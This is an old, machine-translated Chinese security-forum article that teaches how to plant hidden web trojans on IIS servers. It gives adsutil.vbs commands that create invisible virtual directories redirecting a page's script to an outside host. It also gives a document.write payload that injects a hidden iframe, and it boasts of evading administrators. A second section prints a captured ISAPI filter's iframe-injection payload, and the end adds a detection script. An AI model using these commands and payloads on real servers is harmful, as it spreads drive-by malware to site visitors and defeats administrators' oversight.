An unusual way of planting web trojans (挂马) - vulnerability warning - The Black Bar Safety Net

ID MYHACK58:62200817989
Type myhack58
Reporter Anonymous
Modified 2008-01-02T00:00:00


I am not writing this article to teach you how to plant trojans on web pages; planting trojans is wrong! But sometimes you really want to do something that makes people feel good, because I have run into a lot of administrators who, when you tell them their server has a problem, simply do not believe you. You change something to warn them, and they turn out to be more diligent than you are: the moment you change it they put it right back, which is really depressing. Then there are some foreign machines where you have obtained every permission and still cannot tell how he did it: nothing is writable, and a file you finally manage to write is changed back by nobody-knows-whom, which is really !#$%%#%^#%^. Supposedly there is software that monitors important files and restores them as soon as it sees a change; if it monitors the web directory, for example, we cannot change any content on his web site. However, after reading many articles by the big shrimps (the experts) and studying a little myself, I finally figured something out: without writing a single file you can still get someone else's pages altered, with the widely rumoured trojan planting and similar consequences. I am telling you here so that those administrators who only know how to work hard take care!

As you know, when we browse a web site the server processes its information into HTML and returns it to us. What we want is to change the content of the visitor's browser at the moment he visits, so that he unknowingly executes our stuff, trojans and so on. The more common methods are to introduce a frame and set its attributes so that it is invisible in the page, or, for those who are not afraid of dying, to use JavaScript to jump. The slightly more advanced ones use the HTML elements already in the original source, such as the script tag or the frame tag, and introduce another file or page through those tags, or change certain database content that is displayed on the home page, such as an announcement stored in the database, to get the trojan planted.

But all of these require adding something to the server's original source or modifying the site's content, whether through cross-site means or by editing the source directly. That is extremely easy to discover: meet a diligent administrator and your stuff will not stay on the server long! And if some pages are not writable we are stuck as well, so we need to find a more secluded and safer way of planting that solves these problems. First let's go into IIS Manager and have a look! Select a page and look at its properties, as shown in Figure 1. Oh, there is a resource redirection! If we set this page to redirect to a page we control, then whenever a browser requests this page it will instead go to the page we defined. If that page is a web trojan, obviously the visitor gets it! This is a very simple method: only the page's redirection setting in IIS is changed! Anyone who can reach IIS Manager can easily do it. But there is a problem too. If the administrator notices that the page always jumps, checks the site files, restores from backup and still has the problem, he will definitely go and look in IIS! One careful look at the home page's properties and he finds where the problem is and changes it back! So let's keep looking for a more hidden method. Building on the redirection method above: since the home page itself is far too easy to check, look at the HTML tags inside the home page instead! If you find it calling other pages, that is good. For instance, inside a home page there is a tag like this:

<script src=include/mm2.js></script>

Then we have a way: go and modify the properties of include/mm2.js! As shown in Figure 2, redirect it to one of our pages, whose content of course must be something that can be interpreted inside a script tag, such as:

document.write("<iframe style='display:none;' src=http://jnclovesw.com width=0 height=0></iframe>");

This introduces our page! Of course, it is best to also reproduce the JS functions his page expects; that is cover enough! Now the administrator finds that the home page has not changed, goes into IIS and sees that the home page's properties have not changed, and that not one of the www documents on the host has been modified; he will be very depressed! Huh! Even if he restores the previous site backup there is no way to get the page changed back! IIS has so many files that he cannot check the properties of every one! A point worth mentioning here: the file you choose to redirect must be one whose content the HTML tag referencing it can interpret, otherwise there is no effect. For example, with <img src=1.jpg>, redirecting 1.jpg to our trojan page is of no use, because the trojan page is not parsed as HTML but handed to the img tag as a picture. I think the usable tags are script and frame; as for CSS, I believe it can be used too, but I have not yet found the method! I also do not know whether my analysis is right, and everyone is welcome to advise! Let's continue! Suppose your administrator is good enough, finds that you have tampered with mm2.js, and restores it from inside IIS. Our dream is shattered! Is there no more covert method, one that the administrator cannot find even in IIS? The answer is yes! Everyone must remember the IIS configuration vulnerability from long ago: you could create an invisible virtual directory and build a backdoor inside it. We can borrow that too! The principle of that IIS configuration exploit is that a virtual directory created without a physical directory is invisible in IIS, and then you can play little tricks in that directory. So first we create an invisible virtual directory: if the home page calls a js file under the include folder, we create an include directory. This can be done with the IIS administration scripts; adsutil.vbs, in the IIS install directory such as C:\Inetpub\AdminScripts, is a script that controls IIS behaviour. The command we use is:

cscript adsutil.vbs Create W3SVC/1/Root/www/include "IIsWebVirtualDir"

This creates a virtual directory that is invisible in IIS: because no path is set, it is not displayed! Then, inside this directory, create a virtual directory named mm2.js. Huh! Virtual directories can in fact be created with special characters such as the dot:

cscript adsutil.vbs Create W3SVC/1/Root/www/include/mm2.js "IIsWebVirtualDir"

Now there is an include/mm2.js virtual directory! What does that bring to mind? Isn't it exactly the file name the home page calls? Oh! Let's continue!

cscript adsutil.vbs set W3SVC/1/Root/www/include/mm2.js/httpredirect "http://jnclovesw.com/mm1.j...

This changes the redirection setting of the mm2.js virtual directory, as shown in Figure 3. Note that W3SVC/1/Root/www/ stands for the www virtual directory under the first web server in IIS; if you are unsure, use the enum parameter of adsutil.vbs to query for the site you need to change, and for other operations open the help of the adsutil.vbs script! After setting up the virtual directory's redirection this way, now try calling include/mm2.js from the home page: do you think the response is the content of mm2.js or of our mm1.js? The answer is mm1.js, as shown in Figure 4, and the physical file is still there! This is perhaps a property of IIS: it processes the user's request first, and the virtual directory takes precedence over physical files! Then we go into IIS to look, and there is no include virtual directory at all; see Figure 5, nothing! Huh! So we have successfully bypassed the permission restrictions and the administrator's detection! Our trojan hangs on the other party's site, and unless the other party reinstalls IIS or removes our hidden virtual directory, it is very difficult for him to remove our trojan!

The article is very simple; the key is the IIS script command and some understanding of IIS. This way of planting trojans is suited to use after obtaining administrator privileges, and against those administrators who are merely diligent it is still very useful! When we later find that a site has a problem, remember to use this script to check whether there is a problem here too! Or simply back up the IIS settings! When a problem is encountered, restore the IIS settings as well, huh!

  1. Every web page on a server is trojaned, but the trojan code cannot be found in the source files. On one server almost every web site, when a page is opened, even a plain HTML page, shows:

<iframe src="http://xxxdfsfd/web.htm&qu... height=0 width=0></iframe>

This kind of code is generally in the head portion, and the antivirus reports a virus as soon as the page is opened.

Opening the source of the HTML, ASP or PHP page, the code cannot be found no matter how you look.

The first suspicion was JS; half a day of searching found nothing. A newly linked HTML page also carries this piece of code.

Looking carefully, the problem should be in IIS. Open IIS, restart it once, right-click Properties on the main IIS node, and under ISAPI find an ISAPI extension never seen before.

Path: c:\windows\help\wanps.dll; the ISAPI loads normally (green status).

Remove it, restart IIS, and all the code disappears.

The loaded item involves three files:

wanps.ini content:

Cookie=GAG5=ABCDEFG
Redirector=C:\windows\help\wanps.txt

wanps.txt content:

<body>
<iframe src="http://xxx.com/web.htm&quo... height=0 width=0></iframe>
<script language="javascript">
<!--
var expires = new Date();
expires.setTime(expires.getTime() + 5 * 24 * 60 * 60 * 1000);
document.cookie="GAG5=ABCDEFG;expires="+expires.toGMTString();
-->
</script>
</body>
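Added example, not from the original article: a small Python scanner for the two injection signatures the article shows (an iframe sized to zero or hidden by CSS, and an inline script that document.write()s such an iframe), the kind of check an administrator can run over pages fetched as a fresh client with no cookies, since the wanps.txt payload above sets a marker cookie. The host names in the constructed samples are placeholders, not from the page.

```python
import re
from html.parser import HTMLParser

# CSS that hides an iframe, and document.write() of an iframe inside a script
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
DOC_WRITE_IFRAME = re.compile(r"document\.write\s*\(\s*['\"]\s*<iframe", re.I)

class IframeScanner(HTMLParser):
    # collects (kind, detail) findings; _script buffers text while inside <script>
    def __init__(self):
        super().__init__()
        self.findings = []
        self._script = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._script = []
        elif tag == "iframe":
            zero = any(a.get(d, "").strip() in ("0", "0px") for d in ("width", "height"))
            if zero or HIDDEN_STYLE.search(a.get("style", "")):
                self.findings.append(("hidden-iframe", a.get("src", "")))

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body = "".join(self._script)
            if DOC_WRITE_IFRAME.search(body):
                self.findings.append(("script-writes-iframe", body.strip()[:60]))
            self._script = None

def scan_html(body):
    """Return the list of injection findings for one HTML response body."""
    s = IframeScanner()
    s.feed(body)
    s.close()
    return s.findings

# Constructed samples modelled on the payloads quoted in the article (placeholder hosts)
SAMPLE_ISAPI = ('<body><iframe src="http://trojan.example.invalid/web.htm" height=0 width=0></iframe>'
                '<script language="javascript"><!-- var expires = new Date();'
                ' expires.setTime(expires.getTime() + 5 * 24 * 60 * 60 * 1000);'
                ' document.cookie="GAG5=ABCDEFG;expires="+expires.toGMTString(); --></script></body>')
SAMPLE_JS = ('<script>document.write("<iframe style=\'display:none;\' '
             'src=http://trojan.example.invalid width=0 height=0></iframe>");</script>')
SAMPLE_CLEAN = '<body><iframe src="/video" width="640" height="360"></iframe></body>'
```

A page that passes this scan can still be redirected at the IIS level, so pair it with the adsutil.vbs enum check the article recommends.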